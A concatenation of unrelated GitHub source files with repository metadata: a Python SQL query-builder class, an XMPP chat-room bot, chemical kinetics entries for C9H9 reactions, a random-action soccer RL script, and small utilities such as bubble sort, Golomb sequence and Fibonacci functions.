be2603dfc43daf63dc33dc8dd653372c563384f6
|
refs/heads/master
| 2022-03-27T17:28:23.781601
| 2019-12-27T11:06:38
| 2019-12-27T11:06:38
| 229,937,391
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,068
|
py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
#
# Copyright 2016 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# @Time : 2019/12/25 0025 14:58
# @Author : peichao.xu
# @Email : xj563853580@outlook.com
# @File : query.py
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import re
do_dict = {
"where": "__condition",
"table": "__table_name",
"limit": "__limit",
"order": "__order",
"field": "__field",
"data": "__data",
"group": "__group",
"having": "__having",
"join": "__join",
}
class Query(object):
def __init__(self, table_name=None, db=None):
if not table_name == None:
self.table_name = table_name
if not db == None:
self.db = db
self.__reset()
def __reset(self):
self.__cluster = []
self.__protected = {}
self.__protected["__field"] = "*"
self.__protected["__table_name"] = self.table_name
def __close(self):
self.__reset()
def __tracker(self, name):
if (not name in self.__cluster): self.__cluster.append(name)
def __check(self, name):
        return name in self.__cluster
def __do(self, name, value):
value = value.strip() if type(value) == type('string') else value
self.__protected[do_dict[name]] = value
self.__tracker(name)
def __sqlfix(self, sql):
sql = re.sub(r"(?<!%)%(?!%)", "%%", sql)
sql = re.sub(r"(?<!\\)\\(?!\\)", r"\\\\", sql)
return sql
def __valuefix(self, value):
value = re.sub(r"\'", "''", value) if type(value) == type("string") or type(value) == type(
u"unicode") else value
return value
def __sqlbuild(self, sql='', queue=[]):
for statement in queue:
if (self.__check("join") and statement == "join"):
sql = sql + " %s" % self.__protected["__join"]
if (self.__check("where") and statement == "where"):
sql = sql + " WHERE %s" % self.__protected["__condition"]
if (self.__check("order") and statement == "order"):
sql = sql + " ORDER BY %s" % self.__protected["__order"]
if (self.__check("limit") and statement == "limit"):
sql = sql + " LIMIT %s" % self.__protected["__limit"]
if (self.__check("group") and statement == "group"):
sql = sql + " GROUP BY %s" % self.__protected["__group"]
if (self.__check("having") and statement == "having"):
sql = sql + " HAVING %s" % self.__protected["__having"]
if (self.__check("data") and statement == "data:save"):
sets = ""
for data in self.__protected["__data"]:
sets = sets + "%s = '%s', " % (data, self.__valuefix(self.__protected["__data"][data]))
sets = sets.strip().rstrip(",")
sql = sql + " SET %s" % sets
if (self.__check("data") and statement == "data:add"):
sets = ""
values = ""
for data in self.__protected["__data"]:
sets = sets + "%s, " % data
values = values + "'%s', " % self.__valuefix(self.__protected["__data"][data])
sets = sets.strip().rstrip(",")
values = values.strip().rstrip(",")
sql = sql + " (%s)" % sets
sql = sql + " VALUES (%s)" % values
return sql
def prepend(self, name, value):
self.__protected[do_dict[name]] = "%s AND %s" % (value, self.__protected[do_dict[name]])
return self
def table(self, table_name):
self.__do("table", table_name)
return self
def where(self, condition):
self.__do("where", condition)
return self
def limit(self, start, end=None):
limit = start if not end else "%s, %s" % (start, end)
self.__do("limit", limit)
return self
def order(self, type):
self.__do("order", type)
return self
def field(self, field):
self.__do("field", field)
return self
def data(self, data):
self.__do("data", data)
return self
def group(self, type):
self.__do("group", type)
return self
def having(self, condition):
self.__do("having", condition)
return self
def join(self, condition):
self.__do("join", condition)
return self
def query(self, sql):
self.__close()
sql = self.__sqlfix(sql)
return self.db.query(sql)
def grasp(self, sql):
select_regx = re.compile(
"SELECT (COUNT\()?(?P<field>[\w\*\s\.,]+)\)? FROM (?P<table_name>.*?)(LIMIT|ORDER|GROUP|HAVING|WHERE|LEFT|RIGHT|INNER|$)",
re.I)
where_complex_regx = re.compile("WHERE (?P<condition>.*?)(LIMIT|ORDER|GROUP|HAVING|LEFT|RIGHT|INNER)", re.I)
where_regx = re.compile("WHERE (?P<condition>.*)", re.I)
limit_regx = re.compile("LIMIT (?P<start>\d+),?\s*(?P<end>\d+)?", re.I)
group_regx = re.compile("GROUP BY (?P<group_by>[\w\.]+)", re.I)
having_regx = re.compile("HAVING (?P<having>\w+)", re.I)
order_regx = re.compile(
"ORDER BY (?P<order_by>[\w\.\,\s]+\s+(ASC|DESC|\(\)|\s))\s*(LIMIT|GROUP|HAVING|WHERE|LEFT|RIGHT|INNER|$)",
re.I)
insert_regx = re.compile(
"INSERT INTO (?P<table_name>\w+) \(((\w+,?\s?)+)\) VALUES \((([\"']?\w+[\"']?,?\s?)+)\)", re.I)
update_complex_regx = re.compile(
"UPDATE (?P<table_name>\w+) SET (.*?)(LIMIT|ORDER|GROUP|HAVING|WHERE|LEFT|RIGHT|INNER)", re.I)
update_regx = re.compile("UPDATE (?P<table_name>\w+) SET (.*)", re.I)
table_regx = re.compile("FROM (?P<table_name>.*?)(LIMIT|ORDER|GROUP|HAVING|WHERE|LEFT|RIGHT|INNER|$)", re.I)
join_regx = re.compile(
"(?P<join_condition>(?P<join_dir>LEFT|RIGHT)?\s*(?P<join_type>INNER|OUTER)? JOIN (?P<table_name>\w+) (AS \w+\s+)?ON (.*?))(LIMIT|ORDER|GROUP|HAVING|WHERE)",
re.I)
select = select_regx.search(sql)
where_complex = where_complex_regx.search(sql)
where = where_regx.search(sql)
limit = limit_regx.search(sql)
group = group_regx.search(sql)
having = having_regx.search(sql)
order = order_regx.search(sql)
insert = insert_regx.search(sql)
update_complex = update_complex_regx.search(sql)
update = update_regx.search(sql)
table = table_regx.search(sql)
join = join_regx.search(sql)
if select:
_field = select.groupdict()["field"]
_table_name = select.groupdict()["table_name"]
self.__do("field", _field)
self.__do("table", _table_name)
if where_complex:
_condition = where_complex.groupdict()["condition"]
self.__do("where", _condition)
elif where:
_condition = where.groupdict()["condition"]
self.__do("where", _condition)
if limit:
start = limit.groupdict()["start"]
end = limit.groupdict()["end"]
_limit = start if not end else "%s, %s" % (start, end)
self.__do("limit", _limit)
if group:
_group_by = group.groupdict()["group_by"]
self.__do("group", _group_by)
if having:
            _having = having.groupdict()["having"]
self.__do("having", _having)
if order:
_order_by = order.groupdict()["order_by"]
self.__do("order", _order_by)
if table:
_table_name = table.groupdict()["table_name"]
self.__do("table", _table_name)
if join:
_join = join.groupdict()["join_condition"]
self.__do("join", _join)
if insert:
_table_name = insert.groupdict()["table_name"]
fields = insert.groups()[1].split(",")
values = insert.groups()[3].split(",")
_data = {}
for index, field in enumerate(fields):
field = field.strip()
value = values[index].strip()
_data[field] = value
self.__do("data", _data)
self.__do("table", _table_name)
if update_complex:
_table_name = update_complex.groupdict()["table_name"]
pairs = update_complex.groups()[1].split(",")
_data = {}
for index, pair in enumerate(pairs):
pair = pair.split("=")
field = pair[0].strip()
value = pair[1].strip()
_data[field] = value
self.__do("data", _data)
self.__do("table", _table_name)
elif update:
_table_name = update.groupdict()["table_name"]
pairs = update.groups()[1].split(",")
_data = {}
for index, pair in enumerate(pairs):
pair = pair.split("=")
field = pair[0].strip()
value = pair[1].strip()
_data[field] = value
self.__do("data", _data)
self.__do("table", _table_name)
return self
def count(self, cheat=False):
sql = "SELECT COUNT(*) FROM %s" % self.__protected["__table_name"]
sql = self.__sqlbuild(sql, ["join", "where", "group", "having"])
sql = self.__sqlfix(sql)
self.__close()
group_having_regx = re.compile("(GROUP|HAVING)", re.I)
if (not group_having_regx.search(sql)):
return self.db.get(sql)["COUNT(*)"] if not cheat else sql
else:
return len(self.db.query(sql)) if not cheat else sql
def sum(self, field, cheat=False):
sql = "SELECT SUM(%s) FROM %s" % (field, self.__protected["__table_name"])
sql = self.__sqlbuild(sql, ["where"])
sql = self.__sqlfix(sql)
self.__close()
return self.db.get(sql)["SUM(%s)" % field] if not cheat else sql
def find(self, cheat=False):
try:
return self.select()[0] if not cheat else self.select(cheat)
except:
return None
def select(self, cheat=False):
sql = "SELECT %s FROM %s" % (self.__protected["__field"], self.__protected["__table_name"])
sql = self.__sqlbuild(sql, ["join", "where", "group", "having", "order", "limit"])
sql = self.__sqlfix(sql)
self.__close()
return self.db.query(sql) if not cheat else sql
def delete(self, cheat=False):
sql = "DELETE FROM %s" % self.__protected["__table_name"]
sql = self.__sqlbuild(sql, ["where", "order", "limit"])
sql = self.__sqlfix(sql)
self.__close()
return self.db.execute(sql) if not cheat else sql
def save(self, cheat=False):
sql = "UPDATE %s" % self.__protected["__table_name"]
sql = self.__sqlbuild(sql, ["data:save", "where"])
sql = self.__sqlfix(sql)
self.__close()
return self.db.execute(sql) if not cheat else sql
def add(self, cheat=False):
sql = "INSERT INTO %s" % self.__protected["__table_name"]
sql = self.__sqlbuild(sql, ["data:add"])
sql = self.__sqlfix(sql)
self.__close()
return self.db.execute(sql) if not cheat else sql
def pages(self, current_page=1, list_rows=40, cheat=False):
sql = self.select(cheat=True)
self.__close()
count = self.grasp(sql).count()
        pages = count // list_rows
pages = pages + 1 if not count % list_rows == 0 else pages
if (pages == 0): pages = 1
if (current_page < 1): current_page = 1
if (current_page > pages): current_page = pages
start = (current_page - 1) * list_rows
end = list_rows
previous_page = current_page - 1 if current_page > 1 else 1
next_page = current_page + 1 if current_page < pages else pages
result = {}
result["list"] = self.grasp(sql).limit(start, end).select()
result["page"] = {
"prev": previous_page,
"next": next_page,
"current": current_page,
"pages": pages,
"total": count,
}
return result if not cheat else self.grasp(sql).limit(start, end).select(cheat)
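With `cheat=True` every terminal method returns the generated SQL instead of executing it, so the builder can be exercised without a live db handle. A minimal sketch (table and condition are made up):

```python
q = Query(table_name='users', db=None)
sql = q.where("age > 18").order("created_at DESC").limit(10).select(cheat=True)
print(sql)  # SELECT * FROM users WHERE age > 18 ORDER BY created_at DESC LIMIT 10
```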
|
[
"peichao.xu@seetatech.com"
] |
peichao.xu@seetatech.com
|
7ab97c7b41a6cf374e72538106bf02896e8c7fa6
|
21b29ffd891806f03f7821b865fdad9c2a00e729
|
/tom_functions/get_idxs.py
|
9faed6eb0bd02441da9ccc684a3c088b614f6070
|
[] |
no_license
|
mv-lab/kuzushiji-recognition
|
71d46c059d07726d401a364e84900ceb0ebd4d5a
|
08caaeaf40a00e1264b27e0f2157515b8ba8bc95
|
refs/heads/master
| 2020-08-14T10:35:23.277583
| 2019-10-26T08:52:26
| 2019-10-26T08:52:26
| 215,151,222
| 20
| 6
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 323
|
py
|
from sklearn.model_selection import KFold
import numpy as np
def get_idxs(data_names):
kfold = KFold(n_splits=5, shuffle=True, random_state=42)
val_idxs_list = []
for fold, (trn,val) in enumerate(kfold.split(data_names, data_names)):
val_idxs_list.append(val)
return val_idxs_list
|
[
"takeskao76@gmail.com"
] |
takeskao76@gmail.com
|
3bfb3cdac592a51897a817cd39f81cefc47b2ee2
|
c7aa115d30f0ef1369351158ae9a8ab97dc121ae
|
/contrib/seeds/makeseeds.py
|
9a54af5449de3623369a6c49b70f7b9695394d22
|
[
"MIT"
] |
permissive
|
DrakeDragon/DRKE
|
16a1edf7b82e473667c09a01636b80aa52ee251f
|
dc982078c40d522d56923fcd66eccbf53d3cfda0
|
refs/heads/master
| 2021-01-20T10:37:35.194951
| 2014-05-01T16:30:19
| 2014-05-01T16:30:19
| 19,335,687
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 708
|
py
|
#!/usr/bin/env python
#
# Generate pnSeed[] from Pieter's DNS seeder
#
NSEEDS=600
import re
import sys
from subprocess import check_output
def main():
lines = sys.stdin.readlines()
ips = []
pattern = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3}):9653")
for line in lines:
m = pattern.match(line)
if m is None:
continue
ip = 0
for i in range(0,4):
ip = ip + (int(m.group(i+1)) << (8*(i)))
if ip == 0:
continue
ips.append(ip)
for row in range(0, min(NSEEDS,len(ips)), 8):
print " " + ", ".join([ "0x%08x"%i for i in ips[row:row+8] ]) + ","
if __name__ == '__main__':
main()
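Each dotted quad is packed little-endian into a 32-bit integer by the shift loop in `main()`; a quick check of that arithmetic (written for Python 3):

```python
octets = "1.2.3.4".split(".")
ip = 0
for i in range(4):
    ip += int(octets[i]) << (8 * i)  # same shift as in main()
print(hex(ip))  # 0x4030201 -> the last octet ends up in the high byte
```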
|
[
"ixk1@ixk1-nix.(none)"
] |
ixk1@ixk1-nix.(none)
|
f60b73c97d97ca29f0166c2bc0a772c8a6a2ceb8
|
2215c442aa4b716acadfdbab5dd4fb453aad0678
|
/example_random.py
|
d7f042f78d118c5c2747b56c448231802b98bb53
|
[] |
no_license
|
MagnusFelinto/rl-tournament-starter
|
432169be6b6808555d070f39f820f59b1cb2285c
|
c8a5dae929bdd595d5a0bfd049e6a400c4ef5f3f
|
refs/heads/main
| 2023-08-28T20:00:24.932017
| 2021-10-23T18:12:39
| 2021-10-23T18:12:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 745
|
py
|
import soccer_twos
env = soccer_twos.make(render=True, flatten_branched=True)
print("Observation Space: ", env.observation_space.shape)
print("Action Space: ", env.action_space)
team0_reward = 0
team1_reward = 0
env.reset()
while True:
obs, reward, done, info = env.step(
{
0: env.action_space.sample(),
1: env.action_space.sample(),
2: env.action_space.sample(),
3: env.action_space.sample(),
}
)
team0_reward += reward[0] + reward[1]
team1_reward += reward[2] + reward[3]
if max(done.values()): # if any agent is done
print("Total Reward: ", team0_reward, " x ", team1_reward)
team0_reward = 0
team1_reward = 0
env.reset()
|
[
"bryanufg@gmail.com"
] |
bryanufg@gmail.com
|
975e8622daa592d1a122d28698b2e9f19c3f91ba
|
882e9949b0da33b11a5f24156058465da2f95519
|
/input/kinetics/libraries/Aromatics_high_pressure/C9H9_2/reactions.py
|
4b90c6feda3d07d987ead4981efaddc58f03bc15
|
[] |
no_license
|
ReactionMechanismGenerator/RMG-database
|
f4de3a8628951ad7ef154e82b012bfd334d6bc5a
|
b7ff16364a07c9a51a34303aa28407a83455a3e4
|
refs/heads/main
| 2023-09-04T06:18:30.835821
| 2023-08-08T13:37:08
| 2023-08-08T13:37:08
| 1,838,004
| 69
| 94
| null | 2023-09-08T16:39:04
| 2011-06-02T16:09:36
|
Python
|
UTF-8
|
Python
| false
| false
| 2,789
|
py
|
#!/usr/bin/env python
# encoding: utf-8
name = "Aromatics_high_pressure/C9H9_2"
shortDesc = u"Benzyl radical+Acetylene and Benzene+Propargyl radical"
longDesc = u"""
Ab Initio G3-type/Statistical Theory Study of the Formation of Indene in Combustion Flames. I. Pathways Involving Benzene and Phenyl Radical
V. V. Kislov and A. M. Mebel
J. Phys. Chem. A 2007, 111, 3922-3931
level of theory:G3(MP2,CC)//B3LYP/6-311G**, TST rates reported in literature and fitted in RMG
"""
entry(
index = 7,
label = "C7H7_10 + ethyne_8 <=> C9H9_13",
degeneracy = 1,
kinetics = Arrhenius(
A = (31630, 'cm^3/(mol*s)'),
n = 2.479,
Ea = (11.061, 'kcal/mol'),
T0 = (1, 'K'),
),
)
entry(
index = 8,
label = "C9H9_13 <=> C9H9_14",
degeneracy = 1,
kinetics = Arrhenius(A=(1.257e+11, 's^-1'), n=0.139, Ea=(13.233, 'kcal/mol'), T0=(1, 'K')),
)
entry(
index = 9,
label = "C9H9_14 <=> indene_25 + H_15",
degeneracy = 1,
kinetics = Arrhenius(A=(3.597e+10, 's^-1'), n=0.889, Ea=(20.893, 'kcal/mol'), T0=(1, 'K')),
)
entry(
index = 10,
label = "benzene_1 + C3H3_9 <=> C9H9_2",
degeneracy = 1,
kinetics = Arrhenius(
A = (144.6, 'cm^3/(mol*s)'),
n = 2.951,
Ea = (14.055, 'kcal/mol'),
T0 = (1, 'K'),
),
)
entry(
index = 11,
label = "benzene_1 + C3H3_9 <=> C9H9_6",
degeneracy = 1,
kinetics = Arrhenius(
A = (312.3, 'cm^3/(mol*s)'),
n = 2.973,
Ea = (16.396, 'kcal/mol'),
T0 = (1, 'K'),
),
)
entry(
index = 12,
label = "C9H9_2 <=> C9H9_3",
degeneracy = 1,
kinetics = Arrhenius(A=(6.485e+11, 's^-1'), n=0.065, Ea=(27.941, 'kcal/mol'), T0=(1, 'K')),
)
entry(
index = 13,
label = "C9H9_6 <=> C9H9_3",
degeneracy = 1,
kinetics = Arrhenius(A=(5.565e+11, 's^-1'), n=0.009, Ea=(28.521, 'kcal/mol'), T0=(1, 'K')),
)
entry(
index = 14,
label = "C9H9_3 <=> C9H9_24",
degeneracy = 1,
kinetics = Arrhenius(A=(9.527e+10, 's^-1'), n=0.853, Ea=(47.848, 'kcal/mol'), T0=(1, 'K')),
)
entry(
index = 15,
label = "C9H9_24 <=> C9H9_14",
degeneracy = 1,
kinetics = Arrhenius(A=(4.438e+10, 's^-1'), n=0.625, Ea=(38.324, 'kcal/mol'), T0=(1, 'K')),
)
entry(
index = 16,
label = "C9H9_3 <=> C9H9_4",
degeneracy = 1,
kinetics = Arrhenius(A=(1.231e+11, 's^-1'), n=0.765, Ea=(55.941, 'kcal/mol'), T0=(1, 'K')),
)
entry(
index = 17,
label = "C9H9_4 <=> C9H9_5",
degeneracy = 1,
kinetics = Arrhenius(A=(3.677e+10, 's^-1'), n=0.839, Ea=(43.638, 'kcal/mol'), T0=(1, 'K')),
)
entry(
index = 18,
label = "C9H9_5 <=> indene_25 + H_15",
degeneracy = 1,
kinetics = Arrhenius(A=(4.591e+10, 's^-1'), n=0.886, Ea=(24.975, 'kcal/mol'), T0=(1, 'K')),
)
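Each entry stores modified-Arrhenius parameters, k(T) = A (T/T0)^n exp(-Ea / (R T)). A quick evaluation of entry 7 at 1000 K, keeping the units used above (a back-of-the-envelope sketch):

```python
import math

A, n, Ea, T0 = 31630.0, 2.479, 11.061, 1.0  # entry 7: C7H7_10 + ethyne_8
R = 1.987204e-3                             # kcal/(mol*K)
T = 1000.0
k = A * (T / T0) ** n * math.exp(-Ea / (R * T))
print("k(1000 K) = %.3e cm^3/(mol*s)" % k)  # on the order of 3e9
```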
|
[
"ampayne@mit.edu"
] |
ampayne@mit.edu
|
276522ebb23738f05417dc7191682cab9bdbed1e
|
41df021a3082b9b462ab11f917a06c1d87c3857d
|
/src/csv_reader/channel_reader.py
|
bba130dd9170db8dda3dfcdb7c119a139b3e074d
|
[] |
no_license
|
rodrigolazarinigil/mysql_etl
|
f6b0224d87a4c50ec7c82abbb69280fa0dfc360f
|
1e2b01b846e4e5467ab92229a06474697c85450a
|
refs/heads/master
| 2021-06-19T00:26:31.655018
| 2017-06-18T23:08:58
| 2017-06-18T23:08:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 538
|
py
|
"""Leitor de arquivos (ver datafile_name abaixo)."""
import abc
from csv_reader.base_reader import BaseReader
class ChannelReader(BaseReader):
"""Leitor de arquivos."""
def __init__(self):
"""Construtor."""
self.datafile_name = 'channel.csv'
self.column_names = [
'id', 'name', 'account_id'
]
super().__init__()
@abc.abstractmethod
def transform(self):
"""Transformar o data frame."""
self.df.drop_duplicates(subset='id', keep='first', inplace=True)
|
[
"rodrigo.lazarini.gil@gmail.com"
] |
rodrigo.lazarini.gil@gmail.com
|
ebc69e51ec69ea040c5c48d1b773443bed191682
|
b560f533f66af8787039e663795a77173a43d3c1
|
/Algorighms/Sort/BubbleSort.py
|
f3a8e452c5648ed350f28fcfe5c5470e234ac148
|
[
"Apache-2.0"
] |
permissive
|
z-waterking/ClassicAlgorighthms
|
37ac0c22ef53216c87530a6f5134049f86e0a35d
|
b769d46727279cf6d8532819076a3fef496d05c7
|
refs/heads/main
| 2023-04-25T16:44:20.402419
| 2021-05-24T07:15:36
| 2021-05-24T07:15:36
| 310,014,865
| 27
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,180
|
py
|
# -*- coding: utf-8 -*-#
'''
@Project : ClassicAlgorighthms
@File : BubbleSort.py
@USER : ZZZZZ
@TIME : 2021/4/21 16:41
'''
class BubbleSort():
def __init__(self):
self.exchange_count = 0
def Solution(self, nums):
        '''
        Bubble-sort the array elements, sorting from smallest to largest.
        :param nums: list of numbers
        :return: list, the array sorted in ascending order
        '''
        # len(nums) - 1 passes are enough
        for i in range(len(nums) - 1):
            # each pass floats the largest remaining element into place, so the inner loop can stop i items early
            for j in range(len(nums) - 1 - i):
                if nums[j] > nums[j + 1]:
                    nums[j], nums[j + 1] = nums[j + 1], nums[j]
                    # record one swap
                    self.exchange_count += 1
return nums
def GetExchangeCount(self):
return self.exchange_count
if __name__ == "__main__":
nums = [4, 5, 2, 9, 1]
st = BubbleSort()
print("冒泡排序结果为: {}".format(st.Solution(nums)))
print("交换次数为: {}".format(st.GetExchangeCount()))
|
[
"sifan.zsf@alibaba-inc.com"
] |
sifan.zsf@alibaba-inc.com
|
5b33a727698a9e689e58578cd4c124c751a1c2ff
|
213b8cab639c7d45cbf6a4fd46eb23e379d9d374
|
/python/xmpp/sleekxmpp/muc.py
|
809714ac8204f86f33172b1419455cd7e639b5b0
|
[] |
no_license
|
DevDungeon/Cookbook
|
f85b04b690ea0a202ddfaeda6460b6ba5797cb70
|
a49a1c77f2b89dc303fa9f2563bb3c19777e4c6c
|
refs/heads/master
| 2023-05-12T06:58:50.606019
| 2022-03-30T04:48:16
| 2022-03-30T04:48:16
| 34,371,982
| 307
| 94
| null | 2023-05-03T22:53:45
| 2015-04-22T06:02:53
|
HTML
|
UTF-8
|
Python
| false
| false
| 7,413
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
SleekXMPP: The Sleek XMPP Library
Copyright (C) 2010 Nathanael C. Fritz
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
import sys
import logging
import getpass
from optparse import OptionParser
import sleekxmpp
# Python versions before 3.0 do not use UTF-8 encoding
# by default. To ensure that Unicode is handled properly
# throughout SleekXMPP, we will set the default encoding
# ourselves to UTF-8.
if sys.version_info < (3, 0):
reload(sys)
sys.setdefaultencoding('utf8')
else:
raw_input = input
class MUCBot(sleekxmpp.ClientXMPP):
"""
    A simple SleekXMPP bot that greets those who enter
    the room and acknowledges any message that mentions
    the bot's nickname.
"""
def __init__(self, jid, password, room, nick):
sleekxmpp.ClientXMPP.__init__(self, jid, password)
self.room = room
self.nick = nick
# The session_start event will be triggered when
# the bot establishes its connection with the server
# and the XML streams are ready for use. We want to
        # listen for this event so that we can initialize
# our roster.
self.add_event_handler("session_start", self.start)
# The groupchat_message event is triggered whenever a message
        # stanza is received from any chat room. If you also
# register a handler for the 'message' event, MUC messages
# will be processed by both handlers.
self.add_event_handler("groupchat_message", self.muc_message)
# The groupchat_presence event is triggered whenever a
# presence stanza is received from any chat room, including
# any presences you send yourself. To limit event handling
# to a single room, use the events muc::room@server::presence,
# muc::room@server::got_online, or muc::room@server::got_offline.
self.add_event_handler("muc::%s::got_online" % self.room,
self.muc_online)
def start(self, event):
"""
Process the session_start event.
Typical actions for the session_start event are
requesting the roster and broadcasting an initial
presence stanza.
Arguments:
event -- An empty dictionary. The session_start
event does not provide any additional
data.
"""
self.get_roster()
self.send_presence()
self.plugin['xep_0045'].joinMUC(self.room,
self.nick,
# If a room password is needed, use:
# password=the_room_password,
wait=True)
def muc_message(self, msg):
"""
Process incoming message stanzas from any chat room. Be aware
that if you also have any handlers for the 'message' event,
message stanzas may be processed by both handlers, so check
the 'type' attribute when using a 'message' event handler.
Whenever the bot's nickname is mentioned, respond to
the message.
IMPORTANT: Always check that a message is not from yourself,
otherwise you will create an infinite loop responding
to your own messages.
This handler will reply to messages that mention
the bot's nickname.
Arguments:
msg -- The received message stanza. See the documentation
for stanza objects and the Message stanza to see
how it may be used.
"""
if msg['mucnick'] != self.nick and self.nick in msg['body']:
self.send_message(mto=msg['from'].bare,
mbody="I heard that, %s." % msg['mucnick'],
mtype='groupchat')
def muc_online(self, presence):
"""
Process a presence stanza from a chat room. In this case,
presences from users that have just come online are
handled by sending a welcome message that includes
the user's nickname and role in the room.
Arguments:
presence -- The received presence stanza. See the
documentation for the Presence stanza
to see how else it may be used.
"""
if presence['muc']['nick'] != self.nick:
self.send_message(mto=presence['from'].bare,
mbody="Hello, %s %s" % (presence['muc']['role'],
presence['muc']['nick']),
mtype='groupchat')
if __name__ == '__main__':
# Setup the command line arguments.
optp = OptionParser()
# Output verbosity options.
optp.add_option('-q', '--quiet', help='set logging to ERROR',
action='store_const', dest='loglevel',
const=logging.ERROR, default=logging.INFO)
optp.add_option('-d', '--debug', help='set logging to DEBUG',
action='store_const', dest='loglevel',
const=logging.DEBUG, default=logging.INFO)
optp.add_option('-v', '--verbose', help='set logging to COMM',
action='store_const', dest='loglevel',
const=5, default=logging.INFO)
# JID and password options.
optp.add_option("-j", "--jid", dest="jid",
help="JID to use")
optp.add_option("-p", "--password", dest="password",
help="password to use")
optp.add_option("-r", "--room", dest="room",
help="MUC room to join")
optp.add_option("-n", "--nick", dest="nick",
help="MUC nickname")
opts, args = optp.parse_args()
# Setup logging.
logging.basicConfig(level=opts.loglevel,
format='%(levelname)-8s %(message)s')
if opts.jid is None:
opts.jid = raw_input("Username: ")
if opts.password is None:
opts.password = getpass.getpass("Password: ")
if opts.room is None:
opts.room = raw_input("MUC room: ")
if opts.nick is None:
opts.nick = raw_input("MUC nickname: ")
# Setup the MUCBot and register plugins. Note that while plugins may
# have interdependencies, the order in which you register them does
# not matter.
xmpp = MUCBot(opts.jid, opts.password, opts.room, opts.nick)
xmpp.register_plugin('xep_0030') # Service Discovery
xmpp.register_plugin('xep_0045') # Multi-User Chat
xmpp.register_plugin('xep_0199') # XMPP Ping
# Connect to the XMPP server and start processing XMPP stanzas.
if xmpp.connect():
# If you do not have the dnspython library installed, you will need
# to manually specify the name of the server if it does not match
# the one in the JID. For example, to use Google Talk you would
# need to use:
#
# if xmpp.connect(('talk.google.com', 5222)):
# ...
xmpp.process(block=True)
print("Done")
else:
print("Unable to connect.")
|
[
"nanodano@devdungeon.com"
] |
nanodano@devdungeon.com
|
07240436b94896e4cd203d2c80217d9e6e354946
|
f0fa96d39a66c3ddaae4266442a13ec3feb7a462
|
/golomb_sequence.py
|
e24d0e8b18815a77114f0005b52c26dab5e85938
|
[] |
no_license
|
ashishgupta2014/problem_solving_practices
|
14d587e98d9996a95efe822335ca4baccb39b1a1
|
bc4f4b07e1e33273010e34428e0c31d2d6656c14
|
refs/heads/master
| 2023-04-26T03:47:40.766508
| 2021-06-07T04:55:52
| 2021-06-07T04:55:52
| 298,063,915
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 917
|
py
|
def golomb_sequence(n, arr):
"""
https://www.geeksforgeeks.org/golomb-sequence/
    In mathematics, the Golomb sequence is a non-decreasing integer sequence in which the n-th term is equal to
    the number of times n appears in the sequence.
The first few values are
1, 2, 2, 3, 3, 4, 4, 4, 5, 5, 5, ……
Explanation of few terms:
Third term is 2, note that three appears 2 times.
Second term is 2, note that two appears 2 times.
Fourth term is 3, note that four appears 3 times.
Given a positive integer n. The task is to find the first n terms of Golomb sequence.
    :param n: index of the term to compute
    :param arr: memo table of already-computed terms (index 0 unused)
    :return: the n-th term of the Golomb sequence
"""
if n == 1:
return 1
if arr[n] != 0:
return arr[n]
arr[n] = 1 + golomb_sequence(n - golomb_sequence(golomb_sequence(n - 1, arr), arr), arr)
return arr[n]
n = 6
arr = [0] * (n+1)
for i in range(1, n + 1):
print(golomb_sequence(i, arr), end=" ")
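The same recurrence (a(1) = 1, a(n) = 1 + a(n - a(a(n - 1)))) can also be filled in iteratively, which avoids the nested recursion; a sketch:

```python
def golomb_first_n(n):
    a = [0, 1]  # 1-indexed: a[1] = 1, index 0 unused
    for k in range(2, n + 1):
        a.append(1 + a[k - a[a[k - 1]]])
    return a[1:]

print(golomb_first_n(6))  # [1, 2, 2, 3, 3, 4]
```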
|
[
"ashish.2007g@gmail.com"
] |
ashish.2007g@gmail.com
|
f48ebb2d34d6a796df71d3ba1d81367099f02ef8
|
eda7ed06b80be37b1312ec15992c79153cccab60
|
/python/fib.py
|
3b25c42ddbe7256594c129f1af34e4cbaa73a38f
|
[] |
no_license
|
niraj17/work
|
ab01a31ce0692d2cdcb66edd288e0d44b0d32deb
|
033cb2e48c5d41a9e97077d51cee8b73410d3a80
|
refs/heads/master
| 2021-03-12T23:07:56.580448
| 2016-12-23T05:26:14
| 2016-12-23T05:26:14
| 7,384,079
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 326
|
py
|
#!/usr/bin/env python
import sys
def fib(n):
last2 = 0
last = 1
if n == 0 or n == 1:
return n
for i in range(2, n+1):
f = last + last2
last2 = last
last = f
return f
def main():
ans = fib(int(sys.argv[1]))
print "Fib=", ans
if __name__ == '__main__':
main()
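# Example invocation (a hypothetical shell session; Python 2 is required
# because of the print statement above):
#   $ ./fib.py 10
#   Fib= 55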
|
[
"niraj17@gmail.com"
] |
niraj17@gmail.com
|
6f1bc0864ae57891b44f10a086a77cb09a0b781d
|
fb3b50051e4fd919ab4de94312da32faf33c7d21
|
/research/self_driving_car/car/neural_network.py
|
bbe4aecd5cd1e22d722ec000770b592cd21ebe23
|
[
"MIT"
] |
permissive
|
hoangtnm/deep-learning
|
95310078120657c27e90c58f73981863e52db06d
|
bbc2c1adb38bfd7c066a4fe6b5a0e0dab6df21cb
|
refs/heads/master
| 2021-06-24T04:48:23.113663
| 2020-05-20T08:40:20
| 2020-05-20T08:40:20
| 139,654,631
| 2
| 2
|
MIT
| 2020-05-20T08:40:21
| 2018-07-04T01:43:20
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,456
|
py
|
